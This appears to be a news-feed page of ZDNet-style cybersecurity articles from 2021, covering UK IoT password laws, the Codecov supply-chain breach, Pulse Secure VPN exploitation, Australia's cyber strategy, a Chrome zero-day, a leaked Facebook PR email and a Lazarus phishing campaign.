Information Technology

Easy-to-guess default passwords will be banned and smart device manufacturers will be required to tell customers how long their new product will receive security updates under plans to protect Internet of Things (IoT) devices and their users from cyberattacks.Laws will also require manufacturers of smart devices including phones, doorbells, cameras, speakers, TVs and more to provide a public point of contact to make it simpler for security vulnerabilities in the products to be reported – and fixed with software updates.

Internet of Things

Households and businesses are increasingly connecting IoT products to their networks – but while they’re being deployed with the aim of providing benefits, insecure IoT devices can be exploited by cyber criminals.SEE: IoT: Major threats and security tips for devices (free PDF) (TechRepublic)That can lead to malicious hackers using insecure smart devices as a stepping stone onto corporate or personal networks and using that access as a means of conducting cyberattacks, as well as potentially invading the privacy of users.In an effort to protect smart devices, the UK government’s department for Digital, Culture, Media and Sport has announced the the need for IoT devices to be Secure by Design will become law. DCMS had previously proposed the the idea, but now it has moved another step towards actually becoming legislation – and smartphones will be included in the plans.Under the planned new laws, customers must be informed at the point of sale as to the length of time for which a smart device will receive security software updates in a move designed to encourage people to buy devices that are going to receive security patches for a long time – making them more resilient to cyber threats that exploit new vulnerabilities.

This will also apply to smartphones, which are now going to be included in any legislation designed to boost the defences of connected devices. The addition of smartphones comes following a government call for views on smart device security in which respondents suggested the amount of personal information on smartphones, and the way they’re so widely used, means they should be included in smart device safety legislation.Manufacturers will also be banned from using default passwords such as ‘password’ or ‘admin’ in an effort to protect users from opportunistic cyberattacks that take advantage of common or weak passwords to gain control of devices. The proposed legislation builds on a previously published code of practice for IoT device manufacturers – although now the suggestions would be required, not just recommended.”Consumers are increasingly reliant on connected products at work and at home. The COVID-19 pandemic has only accelerated this trend and while manufacturers of these devices are improving security practices gradually, it is not yet good enough,” said Ian Levy, technical director at the National Cyber Security Centre (NCSC).”To protect consumers and build trust across the sector, it is vital that manufacturers take responsibility and pay attention to these proposals now,” he added.SEE: Hackers are actively targeting flaws in these VPN devices. Here’s what you need to doThe NCSC has previously provided advice for consumers on how to keep their IoT devices secure. There’s currently no indication of when the proposals will be made law, but the government says the legislation will be introduced “as soon as parliamentary time allows” and businesses will be given time to adjust to the laws once they’re introduced.There’s also no details as yet about how the legislation will be enforced, or what measures will be taken against smart device manufacturers or retailers that aren’t compliant. MORE ON CYBERSECURITY More

DevOps tool provider Codecov’s security breach has impacted “hundreds” of clients according to new information surrounding the incident. 

US investigators examining the case told Reuters on Tuesday that the attackers responsible for the hack managed to exploit not only Codecov software, but also potentially used the organization as a springboard to compromise a huge number of customer networks.Based in San Francisco, Codecov offers code coverage and software testing tools. The aim is to allow users to deploy “healthier” code during the DevOps cycle, but on or around January 31, 2021, an unknown attacker was able to exploit an error in Codecov’s Docker image creation process to tamper with the Codecov Bash Uploader script.  This has led to the potential export of information stored in users’ continuous integration (CI) environments.  Speaking on condition of anonymity to the news agency, one of the investigators said attackers used automation to collect credentials as well as “raid additional resources,” which may have included data hosted on the networks of other software development program vendors, including IBM.  An IBM spokesperson told Reuters that, as of now, there does not seem to be any “modifications of code involving clients” or the company itself. Codecov accounts for over 29,000 overall enterprise clients. The organization also works extensively with the open source community and startups. 

The initial compromise and backdoor in the Bash Uploader script were discovered on April 1, impacting Codecov’s full set of “Bash Uploaders” including the Codecov-actions uploader for Github, the Codecov CircleCl Orb, and the Codecov Bitrise Step.  It is possible that the supply chain attack, made possible by compromising a resource used by other organizations, may have resulted in the theft of credentials, tokens, and keys running through client CIs, as well as “services, datastores, and application code that could be accessed with these credentials,” according to Codecov.  In addition, URLs of origin repositories using the Bash Uploaders may have been exposed.  Codecov said the issue has since been fixed and impacted customers were notified via email addresses on file on April 15. It is recommended that users roll their credentials if they have not already done so. Codecov is also rotating internal credentials and has pulled in a third-party cyberforensics firm to conduct an audit. A new monitoring system is also being created to pretend such “unintended changes” from happening in the future.  “Codecov maintains a variety of information security policies, procedures, practices, and controls,” commented Jerrod Engelberg, Codecov CEO. “We continually monitor our network and systems for unusual activity, but Codecov, like any other company, is not immune to this type of event.” Due to the potential ramifications of this attack, the FBI is also involved. The ongoing federal investigation has led to suggestions the Codecov situation could be likened to SolarWinds, in which the software vendor’s network was compromised in order to deploy a malicious software update to clients in a separate supply chain attack.  Last week, the FBI, NSA, CISA, and UK government formally blamed cyberattackers working for Russian intelligence for the SolarWinds incident. ZDNet has reached out to Codecov and we will update when we hear back.  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Cybersecurity firm FireEye and the the US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning over attackers exploiting a newly discovered flaw in Pulse Connect Secure VPN products. FireEye reported it has been investigating multiple incidents of compromises of the devices that use a bug tracked as CVE-2021-22893 that was discovered in April. It’s an extremely valuable bug with a severity score of 10 out of a possible 10 and the malware being deployed is designed to bypass two-factor authentication. 

The vulnerability includes an authentication bypass that can “allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway,” according to Pulse Secure’s advisory. SEE: VPN: Picking a provider and troubleshooting tips (free PDF) (TechRepublic)FireEye’s incident response unit Mandiant says it is tracking 12 malware families linked to attacks on Pulse Secure VPN appliances that use this bug in combination with older bugs affecting the software. FireEye has attributed the activity to a group it labels UNC2630, a suspected China state-sponsored hacking group that has allegedly targeted the US Defense industry and European organizations. US-based IT asset management firm Ivanti has released the Pulse Connect Secure Integrity Tool and other mitigations for the bug that’s under attack. 

CISA said the attacks on this VPN product began in June 2020: other bugs the attackers have used include CVE-2019-11510, CVE-2020-8260, and CVE-2020-8243, which allow them to install web shells to gain persistence on the device. As ZDNet reported last August, attackers have been scanning the internet for Pulse Secure VPN servers with these flaws since June because the VPNs are used by staff to remotely access internal apps. “The threat actor is using this access to place web shells on the Pulse Connect Secure appliance for further access and persistence. The known web shells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching,” CISA warned in its alert. According to FireEye, the threat actor was snatching credentials from Pulse Secure VPN login processes, allowing them to use legitimate credentials to move within a compromised network. Carnegie Mellon University’s US CERT Coordination Center has also issued an alert over the attacks and, until a patch is released, it recommends disabling the features Windows File Share Browser and Pulse Secure Collaboration on Pulse Connect Secure (PCS) gateway instances. “An unspecified vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable Pulse Connect Secure gateway system. Products affected by this vulnerability are PCS version 9.0R3 and higher,” it noted. SEE: Best VPN 2021: Expert reviews of the best VPN servicesFireEye is tracking two groups using these vulnerabilities and a variety of web shells that share common traits. It’s tagged the other group UNC2717, but says it cannot verifiably connect that the two groups’ activities are connected. “Due to a lack of context and forensic evidence at this time, Mandiant cannot associate all the code families described in this report to UNC2630 or UNC2717,” said FireEye. “We also note the possibility that one or more related groups is responsible for the development and dissemination of these different tools across loosely connected [Advanced Persistent Threat] actors. It is likely that additional groups beyond UNC2630 and UNC2717 have adopted one or more of these tools.” More

Image: Getty Images
The Australian government has launched a new strategy aimed at uplifting the cybersecurity capabilities of the nation and its international neighbours, pledging an additional AU$37.5 million in funding alongside a handful of greater Indo-Pacific initiatives.Australia’s international Cyber and Critical Technology Engagement Strategy, according to Minister for Foreign Affairs Marise Payne, sets out the goals for a “safe, secure, and prosperous Australia, Indo-Pacific, and world, enabled by cyberspace and critical technology”.It is hoped the strategy [PDF] will strengthen national security, protect Australia’s democracy and sovereignty, promote economic growth, and pursue international peace and stability. The strategy supersedes the 2017 International Cyber Engagement Strategy and is centred on three main pillars — values, security, and prosperity — to guide Australia’s international cyber and critical technology engagement.The first goal is for technology to be used to “uphold and protect liberal democratic values”, the strategy outlined. To achieve this goal, the strategy said Australia will advocate for cyberspace and critical technologies to uphold and protect democratic principles and processes; promote and protect human rights online and in the design, development, and use of critical technologies; support the ethical design, development, and use of critical technologies consistent with international law, including human rights; and advocate for diversity, gender equality, and women’s empowerment in the design, development and use of cyberspace and critical technology.Under the values banner, the strategy pointed to a handful of initiatives that Australia is a part of, including the global partnership on AI and the AI ethics framework that was released in November 2019 to help guide businesses and governments seeking to design, develop, deploy, and operate AI in Australia, as well as the women in international security and cyberspace fellowship that was launched in February 2020 alongside Canada, the Netherlands, New Zealand, and the United Kingdom.

Security, the strategy stated, has the goal of “secure, resilient, and trusted technology.”The Australian government is hopeful that shaping the development and use of critical technology, including cyberspace, will help support international peace and stability. To achieve this, it will aim to build international resilience to digital disinformation and misinformation and their effects; build a strong and resilient cybersecurity capability for Australia, the Indo-Pacific, and the world; strengthen cooperation for enhanced prevention, detection, investigation, and prosecution of cybercrime; and enable a safe and inclusive online environment that will help it achieve such a goal.As part of the strategy, expanding on its “security” pillar, Australia will co-sponsor a proposal to establish a new United Nations program of action for responsible state behaviour in cyberspace. Also under security, the strategy said the government will continue to attribute malicious cyber activities to states, calling it “one tool in Australia’s toolkit”. The government has on eight occasions publicly attributed activity.Further, the government’s existing Cyber Cooperation Program will be renamed as the Cyber and Critical Tech Cooperation Program and will see an additional AU$20.5 million to “strengthen cyber and critical technology resilience in Southeast Asia”. The program, which previously received AU$34 million in official development assistance funding from 2016-2023, was previously touted as playing an important role in supporting Australia’s international cyber engagement, championing an “open, free, and secure internet that protects national security and promotes international stability while driving global economic growth and sustainable development.”The government will also contribute a further AU$17 million to support neighbours in the Pacific to strengthen their cyber capabilities and resilience, including for fighting cybercrime, improving online safety, and countering disinformation and misinformation.The “security” chapter of the strategy also pointed to existing initiatives, including those underway by the eSafety Commissioner; a handful of technology-related legislation, such as the Telecommunications and Other Legislation Amendment (Assistance and Access) Act 2018; work on combating misinformation; and the lacklustre Cyber Security Strategy launched in August. Lastly, under “prosperity”, the strategy stated Australia’s goal would be to use technology to foster sustainable economic growth and development.It aims to do this through supporting a connected and prosperous Indo-Pacific comprised of independent sovereign states enabled by secure and economically viable critical technology; advocating for open, resilient, diverse, and competitive international technology markets and supply chains; strengthening Australian research, industry, and innovation through international cooperation; shaping international critical technology standards that foster interoperability, innovation, transparency, diverse markets, and security-by-design; promoting the multi-stakeholder model of internet governance; and maximising economic growth by shaping an enabling environment for digital trade.Additionally, Australia will also support a partnership with Standards Australia in Southeast Asia, a partnership with the University of Technology, Sydney in Southeast Asia, and a partnership with Trustwave in Fiji, Samoa, Solomon Islands, Tonga, and Vanuatu. “Cyberspace and critical technology is a top foreign policy priority,” Australia’s Ambassador for Cyber Affairs and Critical Technology Dr Tobias Feakin said. “The strategy sets out our goal for a safe, secure, and prosperous Australia, Indo-Pacific, and world enabled by cyberspace and critical technology. It provides a framework to guide Australia’s international engagement.”SEE ALSO More

Image: Getty Images
Google on Wednesday released version 90.0.4430.85 of the Chrome browser for Windows, Mac, and Linux. The release contains seven security fixes, including one for a zero-day vulnerability that was exploited in the wild.The zero-day, which was assigned the identifier of CVE-2021-21224, was described as a “type confusion in V8″.In an advisory penned by Chrome technical program manager Srinivas Sista, five vulnerabilities were detailed: CVE-2021-21222 heap buffer overflow in V8, CVE-2021-21223 integer overflow in Mojo, CVE-2021-21225 out of bounds memory access in V8, CVE-2021-21226 use after free in navigation, and CVE-2021-21224 type confusion in V8.”Google is aware of reports that exploits for CVE-2021-21224 exist in the wild,” he wrote.The advisory thanked five researchers for their contributions and added that its own ongoing security work was responsible for a wide range of fixes.MORE FROM CHROMEGoogle to shorten Chrome update cycle to four weeksIt will also lower the minimum price limit of Android apps, in-app purchases, and subscriptions in 20 markets.

The good and the bad with Chrome web browser’s new security defaultsStarting with Chrome 90, you’ll automatically be directed to the secure version of any website. That’s good, but it’s not as good as you might believe.Google releases Chrome 90 with HTTPS by default and security fixesChrome 90 has arrived with new privacy features and fixes for 37 security flaws. More

An internal email accidentally leaked by Facebook to a journalist has revealed the firm’s intentions to frame a recent data scraping incident as “normalized” and a “broad industry issue.”

Facebook has recently been at the center of a data scraping controversy. Earlier this month, Hudson Rock researchers revealed that information belonging to roughly 533 million users had been posted online, including phone numbers, Facebook IDs, full names, and dates of birth.  The social media giant confirmed the leak of the “old” data, which had been scraped in 2019. A functionality issue in the platform’s contact platform, now fixed, allowed the automatic data pillaging to take place.  The scraping and subsequent online posting of user data raised widespread criticism and on April 14, the Irish Data Protection Commission (DPC) said it planned to launch an inquiry to ascertain if GDPR regulations and/or the Data Protection Act 2018 have been “infringed by Facebook.”  Now, an internal email leaked to the media (Dutch article, translated) has potentially revealed how Facebook wishes to handle the blowback.  This month, Data News editor Pieterjan Van Leemputten sent several queries to Facebook requesting an update on the data scraping incident and further clarity concerning the breach timeline.  However, Facebook accidentally included the journalist in an internal emailed discussion thread.

In the original emails sent to EMEA region PR staff, viewed by ZDNet and dated from April 8, Facebook’s team outlined an overall “long-term strategy” for dealing with coverage of data scraping incidents. “Assuming press volume continues to decline, we’re not planning additional statements on this issue,” the email reads. “Longer term, though, we expect more scraping incidents and think it’s important to both frame this as a broad industry issue and normalize the fact that this activity happens regularly.”  “To do this, the team is proposing a follow-up post in the next several weeks that talks more broadly about our anti-scraping work and provides more transparency around the amount of work we’re doing in this area,” the message continues. “While this may reflect a significant volume of scraping activity, we hope this will help to normalize the fact that this activity is ongoing and avoid criticism that we aren’t being transparent about particular incidents.”  A redacted portion of the email thread is shown below. 
Pieterjan Van Leemputten
The thread also includes lists of existing global coverage surrounding the story, such as by ZDNet, CNET, Graham Cluley, Reuters, The Guardian, and The Wall Street Journal, to name a few; broadcast coverage, and tweets considered “notable,” as well as statistics on social conversion and mentions on Twitter. While describing overall coverage, the email says that publications “have offered more critical takes of Facebook’s response framing it as evasive, a deflection of blame and absent of an apology for the users impacted.” “These pieces are often driven by quotes from data experts or regulators, keen on criticizing the company’s response as insufficient of framing the company’s assertion that the information was already public as misleading,” the team added. “With regulators fully zeroed in on the issue, expect the steady drumbeat of criticism to continue in the press.” Update 13.52 BST: A Facebook spokesperson told ZDNet: “We are committed to continuing to educate users about data scraping. We understand people’s concerns, which is why we continue to strengthen our systems to make scraping from Facebook without our permission more difficult and go after the people behind it.  That’s why we devote substantial resources to combat it and will continue to build out our capabilities to help stay ahead of this challenge.”

Previous and related coverageHave a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

The Lazarus group has tweaked its loader obfuscation techniques by abusing image files in a recent phishing campaign. 

Lazarus is a state-sponsored advanced persistent threat (APT) group from North Korea.  Known as one of the most prolific and sophisticated APTs out there, Lazarus has been in operation for over a decade and is considered responsible for worldwide attacks including the WannaCry ransomware outbreak, bank thefts, and assaults against cryptocurrency exchanges.  South Korean organizations are consistent targets for Lazarus, although the APT has also been traced back to cyberattacks in the US and, more recently, South Africa.  In a campaign documented by Malwarebytes on April 13, a phishing document attributed to Lazarus revealed the use of an interesting technique designed to obfuscate payloads in image files.  The attack chain begins with a phishing Microsoft Office document (참가신청서양식.doc) and a lure in the Korean language. Intended victims are asked to enable macros in order to view the file’s content, which, in turn, triggers a malicious payload.  The macro brings up a pop-up message which claims to be an old version of Office, but instead, calls an executable HTA file compressed as a zlib file within an overall PNG image file. 

During decompression, the PNG is converted to the BMP format, and once triggered, the HTA drops a loader for a Remote Access Trojan (RAT), stored as “AppStore.exe” on the target machine.   “This is a clever method used by the actor to bypass security mechanisms that can detect embedded objects within images,” the researchers say. “The reason is because the document contains a PNG image that has a compressed zlib malicious object and since it’s compressed it can not be detected by static detections. Then the threat actor just used a simple conversion mechanism to decompress the malicious content.” The RAT is able to link up to a command-and-control (C2) server, receive commands, and drop shellcode. Communication between the malware and C2 is base64 encoded and encrypted using a custom encryption algorithm that has previously been linked to Lazarus’ Bistromath RAT. In related news, Google’s Threat Analysis Group (TAG) warned earlier this month that North Korean threat actors are targeting security researchers across social media. First spotted in January, the scheme now includes a web of sham profiles, browser exploits, and a fake offensive security company.

Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

The most common way cyber-criminal hackers break into enterprise networks is by stealing or guessing usernames and passwords. The attacks, whether the goal is stealing information, executing a ransomware attack or any other means of cybercrime represent a major risk to organisations of all kinds – but there’s one thing that information security teams can do to dramatically help protect the network and its users from cyber criminals. “You want to be using strong authentication for anyone that accesses your environment,” Ann Johnson, corporate vice president of security, compliance & identity business development at Microsoft told ZDNet Security Update.

“We know that, 99% of hacks have some type of password element, however that password was stolen. Using strong authentication will at least give you a first line of defence against that,” she said, adding: “Use multi-factor authentication for 100% of the people that access your environment 100% of the time”. SEE: Network security policy (TechRepublic Premium) Providing employees with multi-factor authentication – which requires the user to confirm that it was really them who just tried to login into their account – helps boost cybersecurity in two ways. First, it makes it a lot more difficult for a cyber criminal to break into an account, even if they know the correct username and password. Second, if multi-factor authentication stops a login attempt not made by the user, it’s an indication of potentially suspicious activity that can serve as an alert about cyber criminals attempting to breach the network.

Microsoft has previously said that multi-factor authentication works to such an extent that it prevents 99.9% of cyberattacks from breaching accounts. But cybersecurity isn’t something that should be passed onto end users – it’s important for organisations to have information security policies in place that will protect people from cyberattacks in the first place. One way of doing this is by applying a least privilege, zero trust model to the network, providing people with the access they need to do their jobs and nothing more. That prevents a cyberattack from taking control of a standard account then leveraging it to gain administrator privilege or move laterally to areas of the network that the employee doesn’t need access for their job – but that cyber criminals could exploit. SEE: Ransomware: Why we’re now facing a perfect storm That’s something that’s proved to be a difficult issue for many organisations over the past year as they have suddenly had to adapt to employees being forced to work remotely. Many employees have found themselves in difficult circumstances, sharing networks or devices with families that could allow attackers onto their device without them even knowing. “Employees may be sharing their device with their child who’s doing schooling and then malware could come in that way,” said Johnson. “So having least privilege on that device and having that device not be able to do anything but the minimum for the job is incredibly important. Your end users do not need admin privilege,” she added.

MORE ON CYBERSECURITY More